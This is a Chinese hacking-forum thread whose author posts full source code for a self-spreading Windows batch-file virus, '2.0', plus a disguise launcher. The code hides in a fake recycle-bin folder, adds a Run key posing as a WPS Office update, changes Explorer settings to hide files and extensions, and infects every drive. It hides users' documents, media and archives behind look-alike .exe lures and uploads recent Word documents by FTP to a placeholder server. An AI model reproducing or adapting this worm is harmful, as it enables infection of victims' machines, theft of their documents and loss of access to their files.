• UID102
  • 登录2018-06-04
  • 粉丝8
  • 发帖29
  • 科研点数0点
h13 发布于2017-10-04 16:04
2/876

bat病毒2.0版本完工(开放代码)

楼层直达
话不多说 直接上代码




主程序代码



@echo off&setlocal enabledelayedexpansion
echo "%~sd0%~p0%~n0"


::----------------------------------------------------------------------------------------------------------------
::确定自身属性并开启文件夹
if /i not "%~d0%~p0" == "C:\$RECYCLE-BIN\" (
  if /i not "%~d0%~p0" == "C:\Windows\System32\" (
    md "%~sd0%~p0%~n0"
    explorer "%~sd0%~p0%~n0"
    attrib +s +a +h "%~sd0%~p0%~n0"
  )
)
::----------------------------------------------------------------------------------------------------------------


::----------------------------------------------------------------------------------------------------------------
::隐藏当前磁盘下自身根目录(若为启动项,则直接隐藏C盘根目录)
attrib +s +a +h "%~d0\$RECYCLE-BIN"


::----------------------------------------------------------------------------------------------------------------
::验证开发者权限,确定自身属性,安装
::有些系统环境下开机自启动后可能会把自身位置变成"C:\Windows\System32\"
if /i not exist "C:\Developer-Certificate\USB-hacker" (
  ::先简单来一次专一性杀毒,为C盘腾出空间
  taskkill /f /t /im update.exe
  del "%USERPROFILE%\AppData\Local\Start\update.exe"
  rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
  ::-------------------------------------------------------------------------------------------------------------
  ::安装
  md C:\$RECYCLE-BIN\Wpsupdater
  attrib +s +a +h C:\$RECYCLE-BIN
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  ::--------------------------------------------------------------------------------------------------------------
  ::重新注册启动项并更改隐藏可见权限
  Reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /f
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d C:\$RECYCLE-BIN\start.exe /f
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f
)
::----------------------------------------------------------------------------------------------------------------


if /i not "%~sd0%~p0%~n0" == "C:\$RECYCLE-BIN\start" (
  if /i not "%~d0%~p0" == "C:\Windows\System32\" (
    if /i not exist "C:\$RECYCLE-BIN\start.exe" (
      copy /y "%~d0\$RECYCLE-BIN\start.exe" "C:\$RECYCLE-BIN\"
      start /d "C:\$RECYCLE-BIN\" start.exe
    )
    ::----------------------------------------------------------------------------------------------------------
    ::任务完成,退出。
    exit
  )
)


::----------------------------------------------------------------------------------------------------------------
::开机后直接跳到此处执行,若非开机启动,此后不予执行。
::专一性杀毒,排除干扰先只杀C盘,以后的慢慢说。
taskkill /f /t /im update.exe
del "%USERPROFILE%\AppData\Local\Start\update.exe"
rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
for /f "delims=" %%g in ('dir/s/b C:\*.exe') do (
  if %%~zg == 100616 (
    taskkill /f /t /im update.exe
    del "%USERPROFILE%\AppData\Local\Start\update.exe"
    rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
    taskkill /f /t /im %%~ng.exe
    del "%%g"
  )    
)
::清除自身缓存
rd /s /q "C:\$RECYCLE-BIN\Cloud_synchronization"
::----------------------------------------------------------------------------------------------------------------


::----------------------------------------------------------------------------------------------------------------
::初始化FTP,搜索文档制作列表
del C:\$RECYCLE-BIN\Winre.wim /q
rd /s /q "C:\$RECYCLE-BIN\Cloud_synchronization"
md C:\$RECYCLE-BIN\Cloud_synchronization
attrib +s +h +a C:\$RECYCLE-BIN\Cloud_synchronization
echo open ftp域名 > C:\$RECYCLE-BIN\Winre.wim
echo ftp账号>>C:\$RECYCLE-BIN\Winre.wim
echo 密码>>C:\$RECYCLE-BIN\Winre.wim
echo bin>>C:\$RECYCLE-BIN\Winre.wim
set da=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
set dc=.docx,.doc,.rtf
for %%f in (%da%) do (
  if exist "%%f:\" (
    for %%h in (%dc%) do (
      for /f "tokens=*" %%g in ('dir /s/b %%f:\*%%h') do (
        for /f "tokens=1-10 delims=/-: " %%i in ("%%~tg !date:~,10! !time:~,5!") do (
          set/a y1=%%i,m1=1%%j%%100,d1=1%%k%%100,h1=1%%l%%100,f1=1%%m%%100,y2=%%n,m2=1%%o%%100,d2=1%%p%%100,h2=1%%q%%100,f2=1%%r%%100
          set /a "f=(1461*(y2+(m2-14)/12)/4+367*(m2-2-(m2-14)/12*12)/12-3*((y2+(m2-14)/12)/100+1)/4-1461*(y1+(m1-14)/12)/4-367*(m1-2-(m1-14)/12*12)/12+3*((y1+(m1-14)/12)/100+1)/4-d1+d2)*1440+(h2-h1)*60+f2-f1"
          if !f! leq 4320 (
            copy /y "%%g" "C:\$RECYCLE-BIN\Cloud_synchronization\"
          )
        )
      )
      copy /y "%userprofile%\Desktop\*%%h" "C:\$RECYCLE-BIN\Cloud_synchronization\"
    )
  )
)
echo mput "C:\$RECYCLE-BIN\Cloud_synchronization\*" >>C:\$RECYCLE-BIN\Winre.wim
echo bye >>C:\$RECYCLE-BIN\Winre.wim
::----------------------------------------------------------------------------------------------------------------


::----------------------------------------------------------------------------------------------------------------
::初始化参数
set da=a,b,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
set dd=.doc,.docx,.dot,.dotx
set de=.xls,.xlsx
set dmo=.mp4,.flv,.rmvb,.mpj,.mpg,.avi,.m4a,.mkv,.mov,.vob,.swf,.mpeg,.webm,.wmv,.3gp
set dmu=.mp3,.m4a,.cd,.ogg,.asf,.wma,.wav,.mp3pro,.rm,.real,.ape,.module,.midi,.vqf,.audible,.flac,.vbr
set dph=.jpg,.bmp,.tga,.tif,.psd
set dpp=.ppt,.pot,.pps,.sldx
set dt=.txt
set dz=.rar,.7z,.zip
::----------------------------------------------------------------------------------------------------------------


::----------------------------------------------------------------------------------------------------------------
::清除已攻击标记,绕过未知BUG
for %%f in (%da%) do (
  rd /s /q "C:\$RECYCLE-BIN\%%f"
  md "C:\$RECYCLE-BIN\c"
)
::----------------------------------------------------------------------------------------------------------------


::----------------------------------------------------------------------------------------------------------------
::初始化完毕,启动主干,攻击ABDEFGHIJKLMNOPQRSTUVWXYZ盘,程序循环从此处开始。
:str
for %%f in (%da%) do (
  if exist "%%f:\" (
    if /i not exist "C:\$RECYCLE-BIN\%%f" (
      if /i not exist "%%f:\Developer-Certificate\USB-hacker" (
        ::--------------------------------------------------------------------------------------------------------
        ::开始自我繁殖
        md %%f:\$RECYCLE-BIN\Wpsupdater
        attrib +s +h +a "%%f:\$RECYCLE-BIN"
        attrib +s +h +a "%%f:\$RECYCLE-BIN\Wpsupdater\"
        copy /y "C:\$RECYCLE-BIN\start.exe" "%%f:\$RECYCLE-BIN\"
        copy /y "C:\$RECYCLE-BIN\Wpsupdater\dd.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
        copy /y "C:\$RECYCLE-BIN\Wpsupdater\de.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
        copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
        copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmu.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
        copy /y "C:\$RECYCLE-BIN\Wpsupdater\dph.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
        copy /y "C:\$RECYCLE-BIN\Wpsupdater\dpp.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
        copy /y "C:\$RECYCLE-BIN\Wpsupdater\dt.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
        ::顺手杀毒,做个好人
        for /f "delims=" %%g in ('dir/s/b %%f:\*.exe') do (
          if %%~zg == 100616 (
            taskkill /f /t /im update.exe
            del "%USERPROFILE%\AppData\Local\Start\update.exe"
            rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
            taskkill /f /t /im %%~ng.exe
            del "%%g"
          )    
        )


        ::--------------------------------------------------------------------------------------------------------
        ::开始繁殖伪文件,隐藏原文件,删除快捷方式(快捷方式通常被用来绕过病毒,所以除掉)
        for /f "tokens=*" %%d in ('dir /s/b %%f:\*lnk') do (
          del "%%d"
        )


        for %%h in (%dd%) do (
          for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
            attrib +s +a +h "%%d"
      copy /y "C:\$RECYCLE-BIN\Wpsupdater\dd.stl" "%%d.exe"
          )
        )


        for %%h in (%de%) do (
          for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
            attrib +s +a +h "%%d"
            copy /y "C:\$RECYCLE-BIN\Wpsupdater\de.stl" "%%d.exe"
          )
        )
  
        for %%h in (%dmo%) do (
          for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
            attrib +s +a +h "%%d"
            copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%d.exe"
          )
        )
      
        for %%h in (%dmu%) do (
          for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
            attrib +s +a +h "%%d"
     copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmu.stl" "%%d.exe"
          )
        )
      
        for %%h in (%dph%) do (
          for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
            attrib +s +a +h "%%d"
            copy /y "C:\$RECYCLE-BIN\Wpsupdater\dph.stl" "%%d.exe"
          )
        )
    
        for %%h in (%dpp%) do (
          for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
            attrib +s +a +h "%%d"
            copy /y "C:\$RECYCLE-BIN\Wpsupdater\dpp.stl" "%%d.exe"
          )
        )


        for %%h in (%dt%) do (
          for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
            attrib +s +a +h "%%d"
            copy /y "C:\$RECYCLE-BIN\Wpsupdater\dt.stl" "%%d.exe"
          )
        )


        for %%h in (%dz%) do (
          for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
            attrib +s +a +h "%%d"
            copy /y "C:\$RECYCLE-BIN\Wpsupdater\dz.stl" "%%d.exe"
          )
        )
    
        ::--------------------------------------------------------------------------------------------------------
        ::释放诱导文件
        copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%f:\伪视频文件,诱导用.avi.exe"
        ::--------------------------------------------------------------------------------------------------------
        for /f "delims=" %%a in ('dir /b "%%f:\"') do (
          set /a n+=1
          set "wj!n!=%%a"
          for /f "tokens=1* delims==" %%a in ('set wj') do (
            echo "%%b"
            for %%i in ("%%f:\%%b") do (
              set stc=%%~ai
                if "!stc:~0,1!"=="d" (
                  echo "%%i 是文件夹"
                  attrib +s +a +h "%%f:\%%b"
                  copy /y "C:\$RECYCLE-BIN\start.exe" "%%f:\%%b.exe"
                )
              )
            )
          )
        )  
        copy /y "C:\$RECYCLE-BIN\Wpsupdater.exe" "%%f:\伪文件夹,诱导用.exe"
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f
        ping -n 4 127.1 >nul
        ::创建已攻击标志
        md C:\$RECYCLE-BIN\%%f
      )
    )
  )
)


::----------------------------------------------------------------------------------------------------------------
::以牺牲代码简洁性为代价,再次绕过未知BUG
for %%f in (%da%) do (
  if /i not exist "%%f:\" (
    rd /s /q "C:\$RECYCLE-BIN\%%f"
  )
)


::----------------------------------------------------------------------------------------------------------------
::开始攻击桌面
if /i not exist "C:\Developer-Certificate\USB-hacker" (
  ::顺手杀毒,做个好人
  for /f "delims=" %%g in ('dir/s/b %userprofile%\Desktop\*.exe') do (
    if %%~zg == 100616 (
      taskkill /f /t /im update.exe
      del "%USERPROFILE%\AppData\Local\Start\update.exe"
      rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
      taskkill /f /t /im %%~ng.exe
      del "%%g"
    )    
  )


  ::--------------------------------------------------------------------------------------------------------------
  ::开始繁殖伪文件,隐藏原文件


  for %%h in (%dd%) do (
    for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
      attrib +s +a +h "%%d"
      copy /y "C:\$RECYCLE-BIN\Wpsupdater\dd.stl" "%%d.exe"
    )
  )


  for %%h in (%de%) do (
    for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
      attrib +s +a +h "%%d"
      copy /y "C:\$RECYCLE-BIN\Wpsupdater\de.stl" "%%d.exe"
    )
  )
  
  for %%h in (%dmo%) do (
    for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
      attrib +s +a +h "%%d"
      copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%d.exe"
    )
  )
      
  for %%h in (%dmu%) do (
    for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
      attrib +s +a +h "%%d"
      copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmu.stl" "%%d.exe"
    )
  )
      
  for %%h in (%dph%) do (
    for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
      attrib +s +a +h "%%d"
      copy /y "C:\$RECYCLE-BIN\Wpsupdater\dph.stl" "%%d.exe"
    )
  )
    
  for %%h in (%dpp%) do (
    for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
      attrib +s +a +h "%%d"
      copy /y "C:\$RECYCLE-BIN\Wpsupdater\dpp.stl" "%%d.exe"
    )
  )


  for %%h in (%dt%) do (
    for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
      attrib +s +a +h "%%d"
      copy /y "C:\$RECYCLE-BIN\Wpsupdater\dt.stl" "%%d.exe"
    )
  )


  for %%h in (%dz%) do (
    for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
      attrib +s +a +h "%%d"
      copy /y "C:\$RECYCLE-BIN\Wpsupdater\dz.stl" "%%d.exe"
    )
  )


  for /f "delims=" %%a in ('dir /b "%userprofile%\Desktop\"') do (
    set /a n+=1
    set "wj!n!=%%a"
    for /f "tokens=1* delims==" %%a in ('set wj') do (
      echo "%%b"
      for %%i in ("%userprofile%\Desktop\%%b") do (
        set stc=%%~ai
        if "!stc:~0,1!"=="d" (
          echo "%%i 是文件夹"
          attrib +s +a +h "%userprofile%\Desktop\%%b"
          copy /y "C:\$RECYCLE-BIN\start.exe" "%userprofile%\Desktop\%%b.exe"
        )
      )
    )
  )
)
copy /y "C:\$RECYCLE-BIN\Wpsupdater.exe" "%userprofile%\Desktop\伪文件夹,诱导用.exe"
del "%userprofile%\Desktop\Wpsupdater.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f
ping -n 4 127.1 >nul
::----------------------------------------------------------------------------------------------------------------


::----------------------------------------------------------------------------------------------------------------
::文档再次同步,再次制作列表并初始化FTP
if /i not exist "C:\$RECYCLE-BIN\Winre.wim" (
  echo open FTP服务器域名 > C:\$RECYCLE-BIN\Winre.wim
  echo ftp账号>>C:\$RECYCLE-BIN\Winre.wim
  echo 密码>>C:\$RECYCLE-BIN\Winre.wim
  echo bin>>C:\$RECYCLE-BIN\Winre.wim
  set da=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
  set dc=.docx,.doc,.rtf
  for %%f in (%da%) do (
    if exist "%%f:\" (
      for %%h in (%dc%) do (
        for /f "tokens=*" %%g in ('dir /s/b %%f:\*%%h') do (
          for /f "tokens=1-10 delims=/-: " %%i in ("%%~tg !date:~,10! !time:~,5!") do (
            set/a y1=%%i,m1=1%%j%%100,d1=1%%k%%100,h1=1%%l%%100,f1=1%%m%%100,y2=%%n,m2=1%%o%%100,d2=1%%p%%100,h2=1%%q%%100,f2=1%%r%%100
            set /a "f=(1461*(y2+(m2-14)/12)/4+367*(m2-2-(m2-14)/12*12)/12-3*((y2+(m2-14)/12)/100+1)/4-1461*(y1+(m1-14)/12)/4-367*(m1-2-(m1-14)/12*12)/12+3*((y1+(m1-14)/12)/100+1)/4-d1+d2)*1440+(h2-h1)*60+f2-f1"
            if !f! leq 3 (
              copy /y "%%g" "C:\$RECYCLE-BIN\Cloud_synchronization\"
            )
          )
        )
      )
    )
  )
)
echo mput "C:\$RECYCLE-BIN\Cloud_synchronization\*" >>C:\$RECYCLE-BIN\Winre.wim
echo bye >>C:\$RECYCLE-BIN\Winre.wim


::----------------------------------------------------------------------------------------------------------------
::再次注册开机启动项,避免查杀。
Reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d C:\$RECYCLE-BIN\start.exe /f
ping -n 16 127.1 >nul


::----------------------------------------------------------------------------------------------------------------


::----------------------------------------------------------------------------------------------------------------
::FTP正式上传
if exist "C:\$RECYCLE-BIN\Winre.wim" (
  @ping FTP服务器域名&&(
    echo FTP_OK
    FTP -s:C:\$RECYCLE-BIN\Winre.wim -i
    rd /s /q "C:\$RECYCLE-BIN\Cloud_synchronization"
    md C:\$RECYCLE-BIN\Cloud_synchronization  
    attrib +s +h +a "C:\$RECYCLE-BIN\Cloud_synchronization"
    del "C:\$RECYCLE-BIN\Winre.wim"
  )||echo FTP_error
)
::----------------------------------------------------------------------------------------------------------------
goto str
  • UID102
  • 登录2018-06-04
  • 粉丝8
  • 发帖29
  • 科研点数0点
h13 发布于2017-10-04 16:05
沙发F
伪装程序代码

@echo off&setlocal enabledelayedexpansion
echo "%~sd0%~p0%~n0"
if exist "%~sd0%~p0%~n0" (
  attrib +s +h +a "%~sd0%~p0%~n0"
  "%~sd0%~p0%~n0"
) else (
  attrib +s +h +a "%~sd0%~p0%~n0.exe"
)

::-------------------------------------------------------------------------------------------------------------------
::安装
if /i not exist "C:\Developer-Certificate\USB-hacker" (
  ::先简单来一次专一性杀毒,为C盘腾出空间
  taskkill /f /t /im update.exe
  del "%USERPROFILE%\AppData\Local\Start\update.exe"
  rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
  md C:\$RECYCLE-BIN\Wpsupdater
  attrib +s +a +h C:\$RECYCLE-BIN
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
  if /i not exist "C:\$RECYCLE-BIN\start.exe" (
    copy /y "%~d0\$RECYCLE-BIN\start.exe" "C:\$RECYCLE-BIN\"
    start /d "C:\$RECYCLE-BIN\" start.exe
  )
)
::-------------------------------------------------------------------------------------------------------------------

::----------------------------------------------------------------------------------------------------------------
::重新注册启动项并更改隐藏可见权限
Reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d C:\$RECYCLE-BIN\start.exe /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f
::---------------------------------------------------------------------------------------------------------------
::任务完成,退出。
exit
  • UID102
  • 登录2018-06-04
  • 粉丝8
  • 发帖29
  • 科研点数0点
h13 发布于2017-10-04 16:06
板凳F
至于安装方法以及用法 请参考
http://bbs.makertime.org/read-1145-1#6544
您需要登录后才可以回帖
发表回复

杩斿洖椤堕儴